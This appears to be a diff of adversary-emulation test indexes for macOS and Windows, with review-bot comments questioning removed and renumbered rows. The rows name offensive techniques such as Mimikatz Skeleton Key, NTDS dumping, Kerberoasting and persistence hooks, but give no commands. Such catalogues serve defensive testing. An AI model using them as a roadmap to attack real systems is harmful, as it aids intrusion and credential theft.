persistence,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
persistence,T1176,Browser Extensions,1,Chrome/Chromium (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
persistence,T1176,Browser Extensions,2,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
persistence,T1176,Browser Extensions,3,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual
persistence,T1176,Browser Extensions,2,Chrome/Chromium (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual
persistence,T1037.002,Boot or Logon Initialization Scripts: Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual
persistence,T1543.004,Create or Modify System Process: Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash
persistence,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,sh
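Review bot: this is the only hunk in the macOS index that adds rows: Chrome/Chromium (Chrome Web Store) (4c83940d-8ca5-4bb2-8100-f46dc914bc3f) becomes test 2 and Firefox and Edge shift to 3 and 4. That is fine in itself, since the GUIDs stay stable, but it sits oddly beside the other hunks of this file, which only delete rows (T1546.018, T1652, T1659, T1007 test 5, T1049 tests 4 and 5); gaining a newer test while losing others suggests the indexes were not all generated from the same tree state. Please state which atomics tree the indexes were generated from and regenerate if it was not the current one.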
@@ -114,8 +114,6 @@ persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc
persistence,T1037.005,Boot or Logon Initialization Scripts: Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
persistence,T1037.005,Boot or Logon Initialization Scripts: Startup Items,2,Add launch script to launch daemon,fc369906-90c7-4a15-86fd-d37da624dde6,bash
persistence,T1037.005,Boot or Logon Initialization Scripts: Startup Items,3,Add launch script to launch agent,10cf5bec-49dd-4ebf-8077-8f47e420096f,bash
persistence,T1546.018,Event Triggered Execution: Python Startup Hooks,4,Python Startup Hook - atomic_hook.pth (macOS),28ca4f81-fa96-47ff-8555-dde98017e89b,sh
persistence,T1546.018,Event Triggered Execution: Python Startup Hooks,5,Python Startup Hook - usercustomize.py (Linux / MacOS),6e78084a-a433-4702-a838-cc7b765d87e8,sh
persistence,T1543.001,Create or Modify System Process: Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash
persistence,T1543.001,Create or Modify System Process: Launch Agent,2,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash
persistence,T1543.001,Create or Modify System Process: Launch Agent,3,Launch Agent - Root Directory,66774fa8-c562-4bae-a58d-5264a0dd9dd7,bash
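Review bot: both T1546.018 Python Startup Hooks rows (test 4, atomic_hook.pth (macOS), 28ca4f81-fa96-47ff-8555-dde98017e89b, and test 5, usercustomize.py, 6e78084a-a433-4702-a838-cc7b765d87e8) are dropped from the persistence section here, and the identical pair is dropped again under privilege-escalation in the `@@ -184,8 +181,6 @@` hunk. Removing a test from the index should go with removing the atomic itself; if those atomics still exist, they silently disappear from the macOS index. Please confirm which it is.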
@@ -128,7 +126,6 @@ persistence,T1078.003,Valid Accounts: Local Accounts,3,Create local account with
persistence,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
persistence,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
command-and-control,T1132.001,Data Encoding: Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
command-and-control,T1659,Content Injection,1,MITM Proxy Injection,9b360eaf-c778-4f07-a6e7-895c4f01ac1c,bash
command-and-control,T1572,Protocol Tunneling,5,Microsoft Dev tunnels (Linux/macOS),9f94a112-1ce2-464d-a63b-83c1f465f801,bash
command-and-control,T1572,Protocol Tunneling,6,VSCode tunnels (Linux/macOS),b877943f-0377-44f4-8477-f79db7f07c4d,sh
command-and-control,T1572,Protocol Tunneling,7,Cloudflare tunnels (Linux/macOS),228c336a-2f79-4043-8aef-bfa453a611d5,sh
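Review bot: dropping the command-and-control row for T1659 (9b360eaf-c778-4f07-a6e7-895c4f01ac1c) here is only half of the change; the same test is also listed under initial-access and is removed there in the `@@ -290,7 +281,6 @@` hunk. The two removals should be reviewed together and the reason for them stated in the commit message.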
@@ -184,8 +181,6 @@ privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc
privilege-escalation,T1037.005,Boot or Logon Initialization Scripts: Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
privilege-escalation,T1037.005,Boot or Logon Initialization Scripts: Startup Items,2,Add launch script to launch daemon,fc369906-90c7-4a15-86fd-d37da624dde6,bash
privilege-escalation,T1037.005,Boot or Logon Initialization Scripts: Startup Items,3,Add launch script to launch agent,10cf5bec-49dd-4ebf-8077-8f47e420096f,bash
privilege-escalation,T1546.018,Event Triggered Execution: Python Startup Hooks,4,Python Startup Hook - atomic_hook.pth (macOS),28ca4f81-fa96-47ff-8555-dde98017e89b,sh
privilege-escalation,T1546.018,Event Triggered Execution: Python Startup Hooks,5,Python Startup Hook - usercustomize.py (Linux / MacOS),6e78084a-a433-4702-a838-cc7b765d87e8,sh
privilege-escalation,T1543.001,Create or Modify System Process: Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash
privilege-escalation,T1543.001,Create or Modify System Process: Launch Agent,2,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash
privilege-escalation,T1543.001,Create or Modify System Process: Launch Agent,3,Launch Agent - Root Directory,66774fa8-c562-4bae-a58d-5264a0dd9dd7,bash
@@ -226,8 +221,6 @@ credential-access,T1056.002,Input Capture: GUI Input Capture,3,AppleScript - Spo
credential-access,T1110.004,Brute Force: Credential Stuffing,2,SSH Credential Stuffing From MacOS,d546a3d9-0be5-40c7-ad82-5a7d79e1b66b,bash
discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh
discovery,T1016.001,System Network Configuration Discovery: Internet Connection Discovery,2,"Check internet connection using ping freebsd, linux or macos",be8f4019-d8b6-434c-a814-53123cdcc11e,bash
discovery,T1652,Device Driver Discovery,4,List loaded kernel extensions (macOS),71eab73d-5d7d-4681-9a72-7873489a5b85,bash
discovery,T1652,Device Driver Discovery,5,Find Kernel Extensions (macOS),c63bbe52-6f17-4832-b221-f07ba8b1736f,bash
discovery,T1087.001,Account Discovery: Local Account,2,View sudoers access,fed9be70-0186-4bde-9f8a-20945f9370c2,sh
discovery,T1087.001,Account Discovery: Local Account,3,View accounts with UID 0,c955a599-3653-4fe5-b631-f11c00eb0397,sh
discovery,T1087.001,Account Discovery: Local Account,4,List opened files by user,7e46c7a5-0142-45be-a858-1a3ecb4fd3cb,sh
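Review bot: the two macOS T1652 Device Driver Discovery rows (test 4, List loaded kernel extensions, 71eab73d-5d7d-4681-9a72-7873489a5b85, and test 5, Find Kernel Extensions, c63bbe52-6f17-4832-b221-f07ba8b1736f) are removed with no replacement, leaving no T1652 entry in the visible macOS discovery section. Confirm this is intended; these are the only macOS-specific rows for the technique in this file, so losing them from the index removes that platform's coverage of T1652.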
@@ -237,7 +230,6 @@ discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,4,Detect Virtu
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,6,Detect Virtualization Environment using sysctl (hw.model),6beae646-eb4c-4730-95be-691a4094408c,sh
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,7,Check if System Integrity Protection is enabled,2b73cd9b-b2fb-4357-b9d7-c73c41d9e945,sh
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,8,Detect Virtualization Environment using system_profiler,e04d2e89-de15-4d90-92f9-a335c7337f0f,sh
discovery,T1007,System Service Discovery,5,System Service Discovery - macOS launchctl,9b378962-a75e-4856-b117-2503d6dcebba,sh
discovery,T1040,Network Sniffing,3,Packet Capture macOS using tcpdump or tshark,9d04efee-eff5-4240-b8d2-07792b873608,bash
discovery,T1040,Network Sniffing,8,Packet Capture macOS using /dev/bpfN with sudo,e6fe5095-545d-4c8b-a0ae-e863914be3aa,bash
discovery,T1040,Network Sniffing,9,Filtered Packet Capture macOS using /dev/bpfN with sudo,e2480aee-23f3-4f34-80ce-de221e27cd19,bash
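Review bot: the T1007 test 5 row (System Service Discovery - macOS launchctl, 9b378962-a75e-4856-b117-2503d6dcebba) is removed here, and no other T1007 row remains in the visible hunk. Same question as for the other deletions in this file: was the launchctl atomic deleted, or is the index stale?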
@@ -256,8 +248,7 @@ discovery,T1016,System Network Configuration Discovery,3,System Network Configur
discovery,T1016,System Network Configuration Discovery,8,List macOS Firewall Rules,ff1d8c25-2aa4-4f18-a425-fede4a41ee88,bash
discovery,T1083,File and Directory Discovery,3,Nix File and Directory Discovery,ffc8b249-372a-4b74-adcd-e4c0430842de,sh
discovery,T1083,File and Directory Discovery,4,Nix File and Directory Discovery 2,13c5e1ae-605b-46c4-a79f-db28c77ff24e,sh
discovery,T1049,System Network Connections Discovery,4,System Network Connections Discovery via ss or lsof (Linux/MacOS),bcf05343-ef1d-4052-8a27-b00c9be42b9f,bash
discovery,T1049,System Network Connections Discovery,5,"System Network Connections Discovery FreeBSD, Linux & MacOS",9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
discovery,T1049,System Network Connections Discovery,3,"System Network Connections Discovery FreeBSD, Linux & MacOS",9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b39d-38d9791407cc,sh
discovery,T1069.001,Permission Groups Discovery: Local Groups,1,Permission Groups Discovery (Local),952931a4-af0b-4335-bbbe-73c8c5b327ae,sh
discovery,T1201,Password Policy Discovery,8,Examine password policy - macOS,4b7fa042-9482-45e1-b348-4b756b2a0742,bash
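Review bot: same pattern as the Linux T1049 hunk: tests 4 (ss or lsof, bcf05343-ef1d-4052-8a27-b00c9be42b9f) and 5 are deleted and GUID 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2 is re-added as test 3, so the ss/lsof test vanishes from the macOS index and the remaining test is renumbered. Please check the T1049 atomic definitions before merging; if the ss/lsof test still exists, both index files in this commit are out of date.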
@@ -290,7 +281,6 @@ impact,T1490,Inhibit System Recovery,12,Disable Time Machine,ed952f70-91d4-445a-
impact,T1529,System Shutdown/Reboot,3,Restart System via `shutdown` - FreeBSD/macOS/Linux,6326dbc4-444b-4c04-88f4-27e94d0327cb,sh
impact,T1529,System Shutdown/Reboot,4,Shutdown System via `shutdown` - FreeBSD/macOS/Linux,4963a81e-a3ad-4f02-adda-812343b351de,sh
impact,T1529,System Shutdown/Reboot,5,Restart System via `reboot` - FreeBSD/macOS/Linux,47d0b042-a918-40ab-8cf9-150ffe919027,sh
initial-access,T1659,Content Injection,1,MITM Proxy Injection,9b360eaf-c778-4f07-a6e7-895c4f01ac1c,bash
initial-access,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,sh
initial-access,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
initial-access,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
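Review bot: this removes the initial-access listing of T1659 (9b360eaf-c778-4f07-a6e7-895c4f01ac1c), the counterpart of the command-and-control removal in the `@@ -128,7 +126,6 @@` hunk above. The commit message should name the tests being de-indexed so a reader of the history can tell a deliberate removal from a regeneration artefact.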
248 discovery T1016 System Network Configuration Discovery 8 List macOS Firewall Rules ff1d8c25-2aa4-4f18-a425-fede4a41ee88 bash
249 discovery T1083 File and Directory Discovery 3 Nix File and Directory Discovery ffc8b249-372a-4b74-adcd-e4c0430842de sh
250 discovery T1083 File and Directory Discovery 4 Nix File and Directory Discovery 2 13c5e1ae-605b-46c4-a79f-db28c77ff24e sh
251 discovery T1049 System Network Connections Discovery 4 3 System Network Connections Discovery via ss or lsof (Linux/MacOS) System Network Connections Discovery FreeBSD, Linux & MacOS bcf05343-ef1d-4052-8a27-b00c9be42b9f 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2 bash sh
discovery T1049 System Network Connections Discovery 5 System Network Connections Discovery FreeBSD, Linux & MacOS 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2 sh
252 discovery T1057 Process Discovery 1 Process Discovery - ps 4ff64f0b-aaf2-4866-b39d-38d9791407cc sh
253 discovery T1069.001 Permission Groups Discovery: Local Groups 1 Permission Groups Discovery (Local) 952931a4-af0b-4335-bbbe-73c8c5b327ae sh
254 discovery T1201 Password Policy Discovery 8 Examine password policy - macOS 4b7fa042-9482-45e1-b348-4b756b2a0742 bash
281 impact T1529 System Shutdown/Reboot 3 Restart System via `shutdown` - FreeBSD/macOS/Linux 6326dbc4-444b-4c04-88f4-27e94d0327cb sh
282 impact T1529 System Shutdown/Reboot 4 Shutdown System via `shutdown` - FreeBSD/macOS/Linux 4963a81e-a3ad-4f02-adda-812343b351de sh
283 impact T1529 System Shutdown/Reboot 5 Restart System via `reboot` - FreeBSD/macOS/Linux 47d0b042-a918-40ab-8cf9-150ffe919027 sh
initial-access T1659 Content Injection 1 MITM Proxy Injection 9b360eaf-c778-4f07-a6e7-895c4f01ac1c bash
284 initial-access T1078.001 Valid Accounts: Default Accounts 3 Enable Guest Account on macOS 0315bdff-4178-47e9-81e4-f31a6d23f7e4 sh
285 initial-access T1078.003 Valid Accounts: Local Accounts 2 Create local account with admin privileges - MacOS f1275566-1c26-4b66-83e3-7f9f7f964daa bash
286 initial-access T1078.003 Valid Accounts: Local Accounts 3 Create local account with admin privileges using sysadminctl utility - MacOS 191db57d-091a-47d5-99f3-97fde53de505 bash
+5 -27
@@ -394,7 +394,6 @@ defense-evasion,T1027,Obfuscated Files or Information,7,Obfuscated Command in Po
defense-evasion,T1027,Obfuscated Files or Information,8,Obfuscated Command Line using special Unicode characters,e68b945c-52d0-4dd9-a5e8-d173d70c448f,manual
defense-evasion,T1027,Obfuscated Files or Information,9,Snake Malware Encrypted crmlog file,7e47ee60-9dd1-4269-9c4f-97953b183268,powershell
defense-evasion,T1027,Obfuscated Files or Information,10,Execution from Compressed JScript File,fad04df1-5229-4185-b016-fb6010cd87ac,command_prompt
defense-evasion,T1027,Obfuscated Files or Information,11,Obfuscated PowerShell Command via Character Array,6683baf0-6e77-4f58-b114-814184ea8150,powershell
defense-evasion,T1564.006,Run Virtual Instance,1,Register Portable Virtualbox,c59f246a-34f8-4e4d-9276-c295ef9ba0dd,command_prompt
defense-evasion,T1564.006,Run Virtual Instance,2,Create and start VirtualBox virtual machine,88b81702-a1c0-49a9-95b2-2dd53d755767,command_prompt
defense-evasion,T1564.006,Run Virtual Instance,3,Create and start Hyper-V virtual machine,fb8d4d7e-f5a4-481c-8867-febf13f8b6d3,powershell
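Review bot: the header counts (-394,7 +394,6) mean one of these seven rows is dropped with nothing taking its place, and the rendered table further down shows it is test 11 of T1027, Obfuscated PowerShell Command via Character Array (GUID 6683baf0-6e77-4f58-b114-814184ea8150). Nothing in the hunk says why an indexed test disappears; if that atomic's YAML is still in the tree, the generator is silently skipping it, so either the YAML removal belongs in this same change set or the generation output should be checked for a parse error on that file before the index is merged.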
@@ -428,7 +427,6 @@ defense-evasion,T1127.001,Trusted Developer Utilities Proxy Execution: MSBuild,2
defense-evasion,T1564.003,Hide Artifacts: Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell
defense-evasion,T1564.003,Hide Artifacts: Hidden Window,2,Headless Browser Accessing Mockbin,0ad9ab92-c48c-4f08-9b20-9633277c4646,command_prompt
defense-evasion,T1564.003,Hide Artifacts: Hidden Window,3,Hidden Window-Conhost Execution,5510d22f-2595-4911-8456-4d630c978616,powershell
defense-evasion,T1556.001,Modify Authentication Process: Domain Controller Authentication,1,Skeleton Key via Mimikatz,0ee8081f-e9a7-4a2e-a23f-68473023184f,powershell
defense-evasion,T1027.006,HTML Smuggling,1,HTML Smuggling Remote Payload,30cbeda4-08d9-42f1-8685-197fad677734,powershell
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,4,Delete a single file - Windows cmd,861ea0b4-708a-4d17-848d-186c9c7f17e3,command_prompt
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,5,Delete an entire folder - Windows cmd,ded937c4-2add-42f7-9c2c-c742b7a98698,command_prompt
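Review bot: the single row removed here (-428,7 +427,6) is Skeleton Key via Mimikatz, GUID 0ee8081f-e9a7-4a2e-a23f-68473023184f, and the same GUID also leaves the persistence hunk at -1003 and the credential-access hunk at -1262, so the index stays consistent with itself. Multi-tactic tests appear once per tactic, so a regeneration has to drop or keep every copy together; a quick check that no GUID in this file lost only some of its tactic rows would make the removals easier to sign off.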
@@ -651,8 +649,6 @@ privilege-escalation,T1546.015,Event Triggered Execution: Component Object Model
privilege-escalation,T1546.015,Event Triggered Execution: Component Object Model Hijacking,3,COM Hijacking with RunDLL32 (Local Server Switch),123520cc-e998-471b-a920-bd28e3feafa0,powershell
privilege-escalation,T1546.015,Event Triggered Execution: Component Object Model Hijacking,4,COM hijacking via TreatAs,33eacead-f117-4863-8eb0-5c6304fbfaa9,powershell
privilege-escalation,T1574.009,Hijack Execution Flow: Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
privilege-escalation,T1546.018,Event Triggered Execution: Python Startup Hooks,1,Python Startup Hook - atomic_hook.pth (Windows),57289962-21dc-4501-b756-80cd30608d9f,powershell
privilege-escalation,T1546.018,Event Triggered Execution: Python Startup Hooks,2,Python Startup Hook - usercustomize.py (Windows),05cc7a2c-ce32-46f2-a358-f27f76718c39,powershell
privilege-escalation,T1546.010,Event Triggered Execution: AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
privilege-escalation,T1546.002,Event Triggered Execution: Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
privilege-escalation,T1037.001,Boot or Logon Initialization Scripts: Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
@@ -812,14 +808,10 @@ persistence,T1556.002,Modify Authentication Process: Password Filter DLL,2,Insta
persistence,T1505.005,Server Software Component: Terminal Services DLL,1,Simulate Patching termsrv.dll,0b2eadeb-4a64-4449-9d43-3d999f4a317b,powershell
persistence,T1505.005,Server Software Component: Terminal Services DLL,2,Modify Terminal Services DLL Path,18136e38-0530-49b2-b309-eed173787471,powershell
persistence,T1176,Browser Extensions,1,Chrome/Chromium (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
persistence,T1176,Browser Extensions,2,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
persistence,T1176,Browser Extensions,3,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual
persistence,T1176,Browser Extensions,4,Google Chrome Load Unpacked Extension With Command Line,7a714703-9f6b-461c-b06d-e6aeac650f27,powershell
persistence,T1137.005,Office Application Startup: Outlook Rules,1,Outlook Rule - Subject Trigger with DeletePermanently Action via COM Object,ffadc988-b682-4a68-bd7e-4803666be637,powershell
persistence,T1137.005,Office Application Startup: Outlook Rules,2,Outlook Rule - Sender Address Trigger with DeletePermanently Action via COM Object,bddfd8d4-7687-4971-b611-50a537ab3ab4,powershell
persistence,T1137.005,Office Application Startup: Outlook Rules,3,Outlook Rule - Auto-Forward Emails to External Address via COM Object,b0bd3d76-a57c-4699-83f4-8cd798dd09bd,powershell
persistence,T1137.005,Office Application Startup: Outlook Rules,4,Outlook Rules - Enumerate Existing Rules via PowerShell COM Object,5ff5249a-5807-480e-ab52-c430497a8a25,powershell
persistence,T1137.005,Office Application Startup: Outlook Rules,5,Outlook Rule - Create Rule with Obfuscated Blank Name (MAPI Evasion),cb814cf8-24f2-41dc-a1cd-1c2073276d4a,powershell
persistence,T1176,Browser Extensions,2,Chrome/Chromium (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual
persistence,T1176,Browser Extensions,5,Google Chrome Load Unpacked Extension With Command Line,7a714703-9f6b-461c-b06d-e6aeac650f27,powershell
persistence,T1546.011,Event Triggered Execution: Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
persistence,T1546.011,Event Triggered Execution: Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell
persistence,T1546.011,Event Triggered Execution: Application Shimming,3,Registry key creation and/or modification events for SDB,9b6a06f9-ab5e-4e8d-8289-1df4289db02f,powershell
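Review bot: inserting Chrome/Chromium (Chrome Web Store), GUID 4c83940d-8ca5-4bb2-8100-f46dc914bc3f, at position 2 shifts Firefox, Edge Chromium Addon - VPN and Google Chrome Load Unpacked Extension With Command Line from 2/3/4 to 3/4/5 while their GUIDs stay the same, so anything that refers to a test as T1176 number 2 rather than by GUID now points at a different test; consider appending the new test as 5, or call the renumbering out in the description. Separately, the counts (-812,14 +808,10) mean eight rows out and four in, and the four T1176 rows are the only additions, so the five T1137.005 Outlook Rules entries leave the index with nothing replacing them; confirm that is intended.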
@@ -1003,15 +995,12 @@ persistence,T1546.015,Event Triggered Execution: Component Object Model Hijackin
persistence,T1546.015,Event Triggered Execution: Component Object Model Hijacking,4,COM hijacking via TreatAs,33eacead-f117-4863-8eb0-5c6304fbfaa9,powershell
persistence,T1137.004,Office Application Startup: Outlook Home Page,1,Install Outlook Home Page Persistence,7a91ad51-e6d2-4d43-9471-f26362f5738e,command_prompt
persistence,T1574.009,Hijack Execution Flow: Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
persistence,T1546.018,Event Triggered Execution: Python Startup Hooks,1,Python Startup Hook - atomic_hook.pth (Windows),57289962-21dc-4501-b756-80cd30608d9f,powershell
persistence,T1546.018,Event Triggered Execution: Python Startup Hooks,2,Python Startup Hook - usercustomize.py (Windows),05cc7a2c-ce32-46f2-a358-f27f76718c39,powershell
persistence,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt
persistence,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell
persistence,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt
persistence,T1197,BITS Jobs,4,Bits download using desktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt
persistence,T1546.010,Event Triggered Execution: AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
persistence,T1546.002,Event Triggered Execution: Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
persistence,T1556.001,Modify Authentication Process: Domain Controller Authentication,1,Skeleton Key via Mimikatz,0ee8081f-e9a7-4a2e-a23f-68473023184f,powershell
persistence,T1037.001,Boot or Logon Initialization Scripts: Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
persistence,T1137.002,Office Application Startup: Office Test,1,Office Application Startup Test Persistence (HKCU),c3e35b58-fe1c-480b-b540-7600fb612563,powershell
persistence,T1547.008,Boot or Logon Autostart Execution: LSASS Driver,1,Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt,8ecef16d-d289-46b4-917b-0dba6dc81cf1,powershell
@@ -1045,7 +1034,6 @@ command-and-control,T1219,Remote Access Software,12,RustDesk Files Detected Test
command-and-control,T1219,Remote Access Software,13,Splashtop Execution,b025c580-029e-4023-888d-a42710d76934,powershell
command-and-control,T1219,Remote Access Software,14,Splashtop Streamer Execution,3e1858ee-3550-401c-86ec-5e70ed79295b,powershell
command-and-control,T1219,Remote Access Software,15,Microsoft App Quick Assist Execution,1aea6d15-70f1-4b4e-8b02-397b5d5ffe75,powershell
command-and-control,T1659,Content Injection,2,MITM Proxy Injection (Windows),dcc2ca85-a21c-43a4-acc7-7314d4e5891c,powershell
command-and-control,T1572,Protocol Tunneling,1,DNS over HTTPS Large Query Volume,ae9ef4b0-d8c1-49d4-8758-06206f19af0a,powershell
command-and-control,T1572,Protocol Tunneling,2,DNS over HTTPS Regular Beaconing,0c5f9705-c575-42a6-9609-cbbff4b2fc9b,powershell
command-and-control,T1572,Protocol Tunneling,3,DNS over HTTPS Long Domain Query,748a73d5-cea4-4f34-84d8-839da5baa99c,powershell
@@ -1101,7 +1089,6 @@ collection,T1560.001,Archive Collected Data: Archive via Utility,12,Copy and Com
collection,T1113,Screen Capture,7,Windows Screencapture,3c898f62-626c-47d5-aad2-6de873d69153,powershell
collection,T1113,Screen Capture,8,Windows Screen Capture (CopyFromScreen),e9313014-985a-48ef-80d9-cde604ffc187,powershell
collection,T1113,Screen Capture,9,Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted,5a496325-0115-4274-8eb9-755b649ad0fb,powershell
collection,T1113,Screen Capture,10,RDP Bitmap Cache Extraction via bmc-tools,98f19852-7348-4f99-9e15-6ff4320464c7,powershell
collection,T1056.001,Input Capture: Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
collection,T1123,Audio Capture,1,using device audio capture commandlet,9c3ad250-b185-4444-b5a9-d69218a10c95,powershell
collection,T1123,Audio Capture,2,Registry artefact when application use microphone,7a21cce2-6ada-4f7c-afd9-e1e9c481e44a,command_prompt
@@ -1262,7 +1249,6 @@ credential-access,T1187,Forced Authentication,3,Trigger an authenticated RPC cal
credential-access,T1558.002,Steal or Forge Kerberos Tickets: Silver Ticket,1,Crafting Active Directory silver tickets with mimikatz,385e59aa-113e-4711-84d9-f637aef01f2c,powershell
credential-access,T1555.004,Credentials from Password Stores: Windows Credential Manager,1,Access Saved Credentials via VaultCmd,9c2dd36d-5c8b-4b29-8d72-a11b0d5d7439,command_prompt
credential-access,T1555.004,Credentials from Password Stores: Windows Credential Manager,2,WinPwn - Loot local Credentials - Invoke-WCMDump,fa714db1-63dd-479e-a58e-7b2b52ca5997,powershell
credential-access,T1556.001,Modify Authentication Process: Domain Controller Authentication,1,Skeleton Key via Mimikatz,0ee8081f-e9a7-4a2e-a23f-68473023184f,powershell
credential-access,T1003.003,OS Credential Dumping: NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
@@ -1272,8 +1258,6 @@ credential-access,T1003.003,OS Credential Dumping: NTDS,6,Create Volume Shadow C
credential-access,T1003.003,OS Credential Dumping: NTDS,7,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell
credential-access,T1003.003,OS Credential Dumping: NTDS,8,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,9,Create Volume Shadow Copy with diskshadow,b385996c-0e7d-4e27-95a4-aca046b119a7,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,10,Copy NTDS in low level NTFS acquisition via MFT parsing,f57cb283-c131-4e2f-8a6c-363d575748b2,powershell
credential-access,T1003.003,OS Credential Dumping: NTDS,11,Copy NTDS in low level NTFS acquisition via fsutil,c7be89f7-5d06-4321-9f90-8676a77e0502,powershell
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,1,Request for service tickets,3f987809-3681-43c8-bcd8-b3ff3a28533a,powershell
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,2,Rubeus kerberoast,14625569-6def-4497-99ac-8e7817105b55,powershell
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,3,Extract all accounts in use as SPN using setspn,e6f4affd-d826-4871-9a62-6c9004b8fe06,command_prompt
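Review bot: the two rows this hunk drops (-1272,8 +1258,6) are NTDS tests 10 and 11, the MFT-parsing and fsutil acquisition variants, which leaves T1003.003 ending at test 9. Among the rows shown they were the only entries covering low-level NTFS acquisition of NTDS.dit rather than a shadow-copy path, so coverage reports built from this index lose that case; if the tests are being retired the change should say so, and if not, their YAML should be checked for whatever made the generator skip them.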
